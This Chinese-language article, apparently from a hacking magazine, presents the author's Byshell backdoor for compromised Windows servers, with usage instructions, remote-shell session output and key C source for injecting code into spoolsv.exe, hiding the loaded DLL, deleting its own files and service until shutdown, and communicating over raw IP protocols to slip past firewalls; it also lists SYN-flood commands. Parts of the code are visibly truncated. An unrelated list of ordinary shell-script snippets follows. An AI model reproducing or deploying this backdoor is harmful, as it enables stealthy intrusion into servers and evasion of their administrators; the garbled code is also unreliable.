Byshell后门:无进程无DLL无硬盘文件

适合读者:入侵爱好者、网络管理员、黑器迷

前置知识:C基本语法

刘流:后门是黑客们永恒的话题,在各大网站如163、Yahoo、北大等相继被黑之后,越来越多的人开始关注服务器的安全,而各种后门技术也空前地火暴起来!今天我们将给大家带来一个重量级后门的使用、编程方法,让广大新手朋友们有好后门玩,让编程技术爱好者有好的后门编程技术可以借鉴。当然,更多的新技术还等你去发掘。

Byshell后门:无进程无DLL无硬盘文件无启动项

  现在网络上流行的木马后门类工具很多,但可以称为精品的则没有多少,大多数新手们还在使用Radmin一类的软件来替代后门程序。不幸的是,它们并不是一个真正的后门,极容易服务器管理员察觉,因此肉鸡经常飞掉也就很正常了。

一个合格的后门至少应该做到不能有陌生进程存在于任务管理器里,给后门进程起一个看起来像系统进程的名字只是掩耳盗铃;不能在注册表Run启动项或者服务启动项里留下众所周知的启动键值或新增服务,当然更不能直接写开始菜单的启动项;不能如同无视管理员或者防火墙一般明目张胆地打开陌生端口;像Bits.dll那样等待连接时无端口,连接时开端口的程序,在端口检查时只有30%的几率能逃脱。另外后门最好能隐藏自己生成的文件,或者避免感染一些管理员经常检查完整性的系统文件。前三点没有做到的后门程序不是一个“比较高级”的后门程序,当然在使用的时候也就没有稳定性、保密性可言了。

按照我的分类,现在常见的后门大概可以分成三个“级别”:

★应用级。如WinShell、Radmin、冰河等,它们基本没有采取别的方法来隐藏自己,只是一个普通的能够实现远程控制的应用程序而已。

★系统级。多多少少采用了一些Ring3下隐藏行踪的编程技术,用得少的比如Bits.dll,Portless,用得多的比如Hxdef。

小提示:Hxdef虽然有一个驱动,但是它对系统的Hook全都是Ring3的,因此大家倾向于称它为系统级而非内核级后门。

★内核级,后门主要部分工作在Ring0,因此有很强的隐蔽性和杀伤力。但是公布的完整的内核级后门数量不多,兼容性也不近人意。这个话题在Phrack和Rootkit.com上有很多有价值的讨论和成果公布。

我在自己写的系统级后门Byshell v0.64中尽力做到以上的要求,然而由于个人能力有限,功能的实现不够全面、稳定,希望大家能给我提好的意见或者替我升级版本。在这篇文章中我将和大家讨论这个开源后门的设计、实现,当然还有实际的应用举例,希望高手不要扔板砖,大家一起讨论。

应用举例

这是一个实现了无进程、无DLL、无硬盘文件、无启动项的后门程序。利用线程注射DLL到系统进程,解除DLL映射并删除自身文件和启动项,关机时恢复。大量地借鉴和学习了农民Cmdbind2的思想,在这里对农民前辈无私共享的精神致以120分感谢。我允许此软件及其源代码自由传播,但引用时应注明出处。在联系作者并得到同意之前,不得将此软件改编或删选后用作商业用途,可用作学习和私人用途。

Byshell 0.64支持的命令列表如下:cmd,shell,endshell,chpass,byver,sysinfo,pslist,pskill,modlist,get,put,reboot,dettach,popmsg,SYN,queryDOS,endDOS,refresh等,具体用法请查看说明书。

小提示:说明书上遗漏了refresh命令,它的作用是清除死掉的连接,并且给你机会重新连接,也可以在你换了一个IP以后,清除原来的连接(否则不能正常连接)。

安装后门时只要把Ntboot.exe和Ntboot.dll上传到肉鸡同一目录并且执行“ntboot.exe –install”即可,安装完成后可手动删除Ntboot.exe和Ntboot.dll,连接的时候用By064cli.exe。注意Byshell v0.64不支持本机对本机测试,v 0.63可以。现在我用v 0.63演示一下使用的效果:

1.连接:

please input the server ip address

127.0.0.1

127.0.0.1 will be connected

input the password(the default one is 'by')

by

#cmddir c:

驱动器 C 中的卷没有标签。

卷的序列号是 CCB2-D751

c: 的目录

2005-01-29  14:22       <DIR>          Documents and Settings

2004-10-01  19:24       <DIR>          Inetpub

2004-11-17  20:56       <DIR>          Intel

2004-10-30  14:18               24,576 isapilog.dll

2004-11-11  00:55               24,576 magic_asp.dll

2005-02-07  21:47       <DIR>          My Music

2004-12-21  00:05                  124 Operate.ini

2005-01-18  22:38       <DIR>          Program Files

2005-02-07  23:31       <DIR>          ubackup

2005-02-02  17:54       <DIR>          WINNT

3 个文件         49,276 字节

7 个目录    124,207,104 可用字节

2.获得并结束Shell:

#shell

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

C:WINNTsystem32>cd..

cd..

C:WINNT>cd..

cd..

C:>dir

dir

驱动器 C 中的卷没有标签。

卷的序列号是 CCB2-D751

C: 的目录

……省略

3 个文件         49,276 字节

7 个目录    124,207,104 可用字节

C:>endshell

shell terminated

#byver

ByShell server version 0.63

Released Dec 19,2004 Copyleft@ "by" co.ltd.

3.进程列举与Kill。这里有BUG,排列不整齐。

#pslist

process:

pid     filename        num_thread      parentpid

8       System  43      0

184     smss.exe        6       8

208     csrss.exe       11      184

232     winlogon.exe    19      184

260     services.exe    31      232

272     lsass.exe       17      232

456     svchost.exe     11      260

488     SPOOLSV.EXE     14      260

524     msdtc.exe       21      260

636     svchost.exe     18      260

656     llssrv.exe      9       260

688     sqlservr.exe    28      260

776     winmgmt.exe     3       260

812     dfssvc.exe      2       260

832     inetinfo.exe    29      260

856     mssearch.exe    6       260

1224    svchost.exe     11      260

1176    explorer.exe    19      1172

1356    igfxtray.exe    2       1176

1404    PFWMain.exe     4       1176

1412    SOUNDMAN.EXE    2       1176

1428    realsched.exe   4       1176

1436    internat.exe    1       1176

1444    sqlmangr.exe    3       1176

1280    BitComet.exe    9       1176

328     notepad.exe     2       1176

1196    MDM.EXE 5       456

1512    conime.exe      1       1088

1520    cmd.exe 1       488

1504    by063cli.exe    1       1176

#pskill1428

OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)

#modlist1520

mods of 1520:

module_id       module_name     module_path

1       ntdll.dll       C:WINNTSystem32ntdll.dll

1       KERNEL32.dll    C:WINNTsystem32KERNEL32.dll

1       USER32.dll      C:WINNTsystem32USER32.dll

1       GDI32.DLL       C:WINNTsystem32GDI32.DLL

1       ADVAPI32.dll    C:WINNTsystem32ADVAPI32.dll

1       RPCRT4.DLL      C:WINNTsystem32RPCRT4.DLL

1       MSVCRT.dll      C:WINNTsystem32MSVCRT.dll

1       IMM32.DLL       C:WINNTSystem32IMM32.DLL

#

好了,就介绍这三个最普通的功能吧。其实在很多场合,这三个功能是最基本的功能,也是最难确保稳定性的三个问题疑难,不过这个后门最突出的特色应该是无进程、无DLL、无硬盘文件、无启动项的实现,在实际的使用过程中相信大家会发现它的优点,下面我们从设计和编程的角度来看这些功能是如何实现的。

设计&编程

在这一部分中我不列举完整的代码,因为它太长了,我将引用关键代码来说明编写思路。

首先是怎样隐藏自身的进程?一个普遍采用的方法就是远程线程注射。但它最大的问题是注射代码到了远程进程的地址空间后,由于地址空间的变化,依赖于原来地址空间的所有直接寻址指令需要重定位。这点对汇编老手来手是很容易理解的,对高级语言程序编写者来说这意味着所有显式和非显式的全局变量(如API地址和字符串)都需要进行手工重定位。

相比于病毒程序,我们很幸福,因为我们的的注射器可以同时向远程进程注射一个“全局变量块”,再把这个块的地址传送到远程函数,然后在远程函数中使用这个块来替代直接寻址的全局变量,从而免于编写完全“自身可重定位”的代码。后者被认为是非常烦琐并且几乎无法用高级语言实现的。但即使是这样,编写可以重定位的代码复杂度仍然比较大,写功能模块比较多的后门程序将会非常累。农民前辈的Cmdbind2实现了完全手工重定位的注射后门,我们看他的源代码可以发现他仅仅在实现最普通的Bind Shell上就花费了很多代码,像ByShell v0.64这样的功能复杂的后门,如果也这样实现功能的话,无疑是难以想象的。

取代直接编写可重定位代码的普遍方法是在注射进入远程进程的函数中加载一个DLL,这样的话系统将为你做重定位工作,后门主要功能实现在DLL中。例如以前的黑防中,单长虹介绍过这种方法。这种方法也有一个小弊端就是管理员在审核被你注射的进程时会发现一个不明的DLL从而导致后门暴露。农民前辈提出了一种思路,先加载DLL,然后把这一块内存全部拷贝到其它地方,卸载DLL,再申请与原来加载DLL相同的地址空间,把其它地方“寄存”的DLL代码拷贝回这个空间。然后直接调用这个DLL,就解决了所有的重定位问题,还不会在被注射进程的加载模块列表里出现我们的DLL。农民前辈并没有实现他的想法为代码,一会给出我用这种方法实现的主要代码。

进行比较讨论时我们也来讨论其它的系统级隐藏进程方法。Bingle采用替代Svchost启动的DLL服务的方法来加载后门,ZXshell也使用了这种方法。这种方法的主要问题是不稳定,必须改写注册表敏感键值并在Svchost.exe的加载模块中出现不明模块。当然如果用和原来同名的木马DLL来替代原来的DLL可以避免以上问题,但是又会遇到新的问题,就是怎样绕过Windows的系统文件保护和管理员例行的系统文件完整性检查。

Hxdef统一采用Hook ring3 API(主要是Ntdll.dll的NativeAPI)的方法完成自身各个方面的隐藏。这种方法对于一般的Ring3检查效果很好,并且可以部分实现端口复用。它的主要问题有Ring3下Hook的手段不多,而且比较“兴师动众”(Hxdef向系统中所有进程注射木马数据),效果还不是很好,极易被Ring0的RootKit Detector发现,如ICESWORD。最后还有就是编程烦琐。

我选用了注射远程进程Spoolsv.exe,假脱机打印服务的方法,并且在注射到远程的函数中加载然后卸载了一个木马DLL——Ntboot.dll,注射器则是Ntboot.exe。请看代码:

void injcode(){HANDLE prohandle;//注射对象进程句柄

DWORD pid=0;//对象进程PID

int ret; //临时变量

//使用toolhelp32函数得到注射对象PID

Sleep(1000);

HANDLE snapshot;

snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32);

char injexe[]="spoolsv.exe";//注射对象进程,大家可以自己改

for(Process32First(snapshot,&processsnap);

Process32Next(snapshot,&processsnap);)

}

CloseHandle(snapshot);//得到PID

//取得SE_DEBUG_NAME权限

HANDLE hToken;

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);

TOKEN_PRIVILEGES tp;

tp.PrivilegeCount = 1;

LookupPrivilegeValue(NULL, SE_DEBUG_NAME,&tp.Privileges[0].Luid);

tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);

//现在注射

prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid);

DWORD WINAPI injfunc(LPVOID);//Injfunc就是注射的函数,需要手工重定位

//下面取得需要用的API地址并写进将要注射的全局变量块,Injapistr是全局结构,是全局变量块的内容

HMODULE hModule;

LPVOID paramaddr;//全局变量块地址

hModule=LoadLibrary("kernel32.dll");

injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA");

injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress");

injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc");

injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary");

injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr");

injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree");

//在目标进程里分配“全局变量块”,并写入API地址

paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0);

//写入Injfunc函数

void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0);

//激活远程线程

CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0);

CloseHandle(prohandle);

return;

}

//注射到远程的函数,负责完成加载和卸载功能复杂的木马DLL的艰巨任务

DWORD WINAPI injfunc(LPVOID paramaddr){

//paramaddr,全局变量块首址。所有静态全局变量都需要重定位(直接寻址的),而动态分配(堆,Virtualalloc)和栈变量不需要,因为他们使用间接寻址。其实字符串也可以在刚才写进全局变量块,但是字符串不多,这里直接用ASM搞定。

char ntboot[16];

char msgbox[16];//变量名字起错了,应该是DLL的后门主函数名。汗,希望不要误导大家。

INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr;

__asm{

mov ntboot,'n'

mov ntboot+1,'t'

mov ntboot+2,'b'

mov ntboot+3,'o'

mov ntboot+4,'o'

mov ntboot+5,'t'

mov ntboot+6,'.'

mov ntboot+7,'d'

mov ntboot+8,'l'

mov ntboot+9,'l'

mov ntboot+10,0

mov msgbox,'C'

mov msgbox+1,'m'

mov msgbox+2,'d'

mov msgbox+3,'S'

mov msgbox+4,'e'

mov msgbox+5,'r'

mov msgbox+6,'v'

mov msgbox+7,'i'

mov msgbox+8,'c'

mov msgbox+9,'e'

mov msgbox+10,0

}

HMODULE hModule=pinjapistr->myLoadLibrary(ntboot);//加载Ntboot.dll

DWORD (WINAPI *myCmdService)(LPVOID);//DLL后门的主函数名

myCmdService=(DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule,msgbox));

//各位看官,以下是精华了:

unsigned int memsize=0;

void * tempdll=pinjapistr->myVirtualAlloc(0,0x23000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

memcpy(tempdll,hModule,0x23000);

//0x23000是DLL的大小,不多不少。如果你改变了Ntboot.dll的大小请注意调整这个值

pinjapistr->myFreeLibrary(hModule);

hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,0x23000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

memcpy(hModule,tempdll,0x23000);

pinjapistr->myVirtualFree(tempdll,0x23000,MEM_DECOMMIT);

//结束,DLL没有被加载,但是又可以发挥作用,爽吧?!

myCmdService(0);//调用后门主函数。

return 0;

}

下一个问题是启动项和文件。Ntboot.exe是后门的注射器,将自己作为服务启动,我们决不能让管理员发现服务键值。怎么办?这个也是农民前辈提出的思想:先删除所有后门文件和服务,设定一个关机通知和一个一键关机钩子,在即将关机的时候写入文件和服务项。同样的,一开机这个服务只要启动了就会先把自己删除。这样就实现了无文件和无启动项。管理员用注册表对比将不能发现异常,也无处寻找我们的后门文件。看一下设定一个关机通知和一个一键关机钩子的代码:

DWORD WINAPI hookthread( LPVOID lpParam ){

MSG msg;int tmpret;char tmpstr[100];

LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam);

msghook=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle(0),0);

if(!msghook)

tmpret=SetConsoleCtrlHandler(HandlerRoutine,1);

if(!tmpret)

while (GetMessage(&msg, NULL, 0, 0)){void resume();

if(msg.message==WM_QUERYENDSESSION)

}

UnhookWindowsHookEx(msghook);

return 0;

}

BOOL WINAPI HandlerRoutine(DWORD dwCtrlType){void resume();

switch(dwCtrlType)

{

case CTRL_SHUTDOWN_EVENT:

resume();//resume函数,顾名思义就是恢复文件启动项

break;

default:

break;

}

return 0;

}

LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam){void resume();

if(code<0){return CallNextHookEx(msghook,code,wParam,lParam);}

if(code==HC_ACTION){

EVENTMSG * pevent=(EVENTMSG *)lParam;

if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0xFF)

}

return CallNextHookEx(msghook,code,wParam,lParam);

}

与Hxdef的Hook文件注册表的Native API相比,这种办法的好处是根本就不存在文件,也不会有什么Ring0的Rootkit Detector发现被Hook API隐藏的文件和注册表项。坏处是如果对方直接拔电源关机我们就“安息”了。于是我们就会安慰自己说:这个后门有足够的隐蔽性,不会让对方怀疑到中了后门,以至于采用掉电关机的BT手段。当然如果你用Hxdef,那么相信我,现在的Rootkit Detector很普遍,Hxdef已经成为众矢之的了,在管理员检查时也会“安息”得很快的。

最后是怎样实现无端口(像用Rootkit隐藏掉端口那种不叫无端口。那种东西不但无法穿过防火墙还会在管理员扫描自己的机器时暴露),这是Byshell v0.64的弱项,Ring3后门本来难有什么好办法来进行端口复用,使用Raw_socket监听TCP只能做到Bits.dll那样的“等待连接时无端口”;把自己加载成SPI基础服务提供者或者分层服务提供者,可以截获所有Ring3网络通讯,但会在注册表和系统中留下足够多的信息从而导致我们后门“安息”。Hxdef的Hook系统中所有进程的Recv/WSArecv方法虽然有不能复用Ring0端口如139,445的弊端,但还是现在看来比较好的Ring3端口复用的办法。到现在为止,Byshell采取的方法是使用Socket_raw的自定义协议,就是非TCP非UDP协议进行通讯,可以穿越大多软件防火墙和一些硬件防火墙,但是它的弊端是不保证穿过所有防火墙,并且不支持Windows XP SP2,因为后者取消了对Socket_raw的支持。我的实现比较简单,就是用一个协议号224监听连接和刷新,另一个协议号225传输后门数据,很简单:

WSADATA WSAData;

WSAStartup(MAKEWORD(2,2),&WSAData);

SOCKET sock224=socket(AF_INET,SOCK_RAW,224);

sockaddr_in srvaddr;

memset(&srvaddr,0,sizeof(struct sockaddr_in));

srvaddr.sin_family= AF_INET;

srvaddr.sin_addr.S_un.S_addr =INADDR_ANY;

ret=bind(sock224,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr));

if(ret){goto label2;}

dwThreadId=0;char buff224[128];

DWORD WINAPI threadfunc( LPVOID lpParam );

HANDLE thrdhndl;

//建立225的连接线程

thrdhndl=CreateThread(0, 0, threadfunc, 0, 0, &dwThreadId);

//等待刷新

while(1){recvfrom(sock224,buff224,128,0,0,0);

if(!strncmp(buff224+32+sizeof(IP_HEADER),"+_)(*&^%$#@!~byrefreshbreak",27) && !strncmp(buff224+sizeof(IP_HEADER),pwd,strlen(pwd))){

TerminateThread(thrdhndl,0);goto label1;}

}

在225的代码里我实现了简单的差错控制,代码比较长这里不列举了,有兴趣的朋友请看源代码。由于这个复用方法不是非常可靠、稳定,所以我公布了Byshell v0.63,它直接开了一个TCP端口138,完全不符合后门要求,但是给大家用来作测试还是可以的。如果大家发现Byshell v0.64不是很稳定可以试试v0.63。不过一个严重的失误是我在Byshell v0.64的说明书里漏了一个命令“refresh”,它可以清除万一出现的225连接死掉,并且给你机会重新连接。

最后就是Byshell实现了非常多的命令,比如查看系统信息、执行命令、在后门连接中上传下载,甚至还有SYN洪水攻击。后门的功能模块是Work()函数,这样便于进行功能拓展和模块化编程。针对它端口复用不理想的现状,我会继续升级。以后可能写成Hxdef那样的Ring3复用,也可能是Ring0的过滤驱动之类的东西,也希望前辈们继续指导我。

我的代码风格并不好,喜欢不分行和紧凑代码,不过还是希望大家一起来开发这个软件。在这个后门的写作中,3个人给了我很大的帮助,请允许我占用篇幅来表示对他们的感谢。他们是谷夕(gxisone),黄鑫(glacier),当然还有农民,这个后门应该是他们的功劳。

如果有问题或者想和我交流,请Mail到baiyuanfan@163.com,谢谢大家对ByShell和我的关注和支持。

(0)

相关推荐

  • shell查找当前目录下大于1M的文件的三种方法分享

    1.使用find的参数实现 复制代码 代码如下: [root@xiaobb mnt]# find . -maxdepth 1 -size +1000000c./sys.tar.gz./install.tar.bz2./CTeX_2.9.0.152_Full.exe./php-5.3.6.tar.gz[root@xiaobb mnt]# ls -lhtotal 1.3G-rw-r--r-- 1 root root 1.1G 2011-04-28 11:35 CTeX_2.9.0.152_Full.

  • 在指定目录查找指定后缀文件的shell脚本代码

    复制代码 代码如下: #!bin/sh  # 在指定位置查找指定后缀的文件,包括子目录  # 用法:  # findf $1 $2  # 第一个参数为后缀  # 查找指定后缀的文件并打印出来  # link:www.jb51.net# date:2013/2/26 f()  {    list=`find $2|grep "/.$1/>"`    for i in $list      do      echo $i    done  } # 打印用法  print()  { 

  • shell判断文件,目录是否存在或者具有权限的代码

    核心代码 #!/bin/sh myPath="/var/log/httpd/" myFile="/var /log/httpd/access.log" #这里的-x 参数判断$myPath是否存在并且是否具有可执行权限 if [ ! -x "$myPath"]; then mkdir "$myPath" fi #这里的-d 参数判断$myPath是否存在 if [ ! -d "$myPath"]; then

  • 合并一个文件夹下多个文件内容的单行shell命令

    合并一个文件夹下多个文件内容: 复制代码 代码如下: find -name "*.log" -exec 'cat' {} \; > test.tmp

  • 找出文件中包含指定字段的文件的shell脚本

    复制代码 代码如下: #!/bin/bash find / -name "*.php" > list.txt f=`cat ./list.txt` for n in $f do r=`egrep 'abc' $n` if [ ! "$r" = "" ] ; then echo $n fi done

  • shell对比文件内容脚本分享

    复制代码 代码如下: #!/bin/shfunction _diffab(){x=0for i in `cat $1`;do        for j in `cat $2`;do                if [ $i == $j ];then                        x=1                        break;                fi        done                if [ $x -ne 1 ];then 

  • linux下保留文件系统下剩余指定数目文件的shell脚本

    本节内容:保留文件系统下剩余指定数目的文件 例子: 复制代码 代码如下: #!/bin/bash #------------------------------- #Description: Back up your files#site: www.jb51.net#------------------------------- #shell 变量path_source=/mnt/fifth/shell path_backup=/mnt/fifth/backup/shellbackup path

  • 批量转换目录下文件编码的shell脚本代码

    一例批量转换目录下文件编码的shell脚本代码. 需求描述:由于从window转linux过来,很多原来win下的gbk文件需要转换成utf8. 以下脚本仅判断非utf8文件转换成utf8文件,并且默认非utf8文件为gbk,如果文件类型不一致需要修改. 例子: 复制代码 代码如下: #!/bin/bash# File Name: iconv.sh# Author: wanggy# site: www.jb51.net#show_file(){    for file in `ls $1`   

  • Visual Style中的shellstyle.dll文件修改方法

    Visual Style中的shellstyle.dll文件修改  2007-3-8 11:25:00  作者: Silencer  shellstyle.dll修改 *部分内容参考自whistl3r的Shellstyle Tutorial 预备知识 1.shellstyle.dll的结构 UIFiles: UIFile1:定义窗体及任务列表样式 UIFile2:定义控制面板样式 Resources:资源文件列表 10,11,12:音乐文件夹 13,14,15:图片文件夹 16,17,18:查找

  • 使用ShellClass获取文件属性详细信息的实现方法

    首先引用COM组件Microsoft Shell Controls And Automation这里需要注意DLL的属性Embed Interop Type 设为False否则会引起互操作类型异常 代码如下ShellClass sh = new ShellClass();Folder dir = sh.NameSpace(Path.GetDirectoryName(sFile));FolderItem item = dir.ParseName(Path.GetFileName(sFile));s

  • 后台实时分流文件的shell脚本

    将bill 文件夹下的文件按一定规则(文件名奇偶)拷贝至bill1,bill2 文件夹下.更新bill1,bill2 处理进度标签(更新file.max)file3 为bill 目录下当前最新文件的标签,正常情况下每分钟会更新(格式为:20121016122100) 复制代码 代码如下: #!/bin/bash#for wanggy 2012/10/16bill1=/infosms/bill1bill2=/infosms/bill2file_max=`cat file3`cd /infosms/

  • 判断文件是否存在的shell脚本代码

    实现代码一. #!/bin/sh # 判断文件是否存在 # link:www.jb51.net # date:2013/2/28 myPath="/var/log/httpd/" myFile="/var /log/httpd/access.log" # 这里的-x 参数判断$myPath是否存在并且是否具有可执行权限 if [ ! -x "$myPath"]; then mkdir "$myPath" fi # 这里的-d

  • 查找目录下同名但不同后缀名文件的shell脚本代码

    因为后台录入的同事,上传文件的时候,给文件取了相同的名字,但不同的后缀名,由于文件路径非常深,大概十层左右,每一层又有几十个文件,所以人工找起来非常麻烦,所以写了个脚本,帮他们实现查找指定目录下所有子目录及文件,找出相同文件名,不同后缀的文件,然后,手动保留其中一个. 复制代码 代码如下: #!/bin/bash  #判断一下脚本参数的问题  if [ $# -ne 1 ];then     echo "Usage find_same.sh direcroty"     exit  f

  • shell去掉文件中空行(空白行)的方法详解

    本文详细介绍了使用shell去除文件中的空行的方法,学习下sed.awk.shell文件检测的方法,有需要的朋友可以作个参考. 本节内容:shell去掉文件中空行 1,shell 去掉文件中的空行 复制代码 代码如下: cat filename | sed -e '/^$/d' > filename 2,保留最新的9个文件,其它的文件删除的命令语句 复制代码 代码如下: ls -t | awk '{if(NR>9){print $0}}' |xargs rm -f 附,shell中的特殊变量

  • shell替换文件中的文件路径脚本分享

    用法参数1.写有需要替换路径记录的文本,格式:老路径 老名称 新路径 新名称参数2.需要替换的文件的目录参数3.需要替换的文件的类型 复制代码 代码如下: #!/bin/sh function _replace(){basepath=$0> $basepath.logi=1while read linedo        echo "start==========================================================================

随机推荐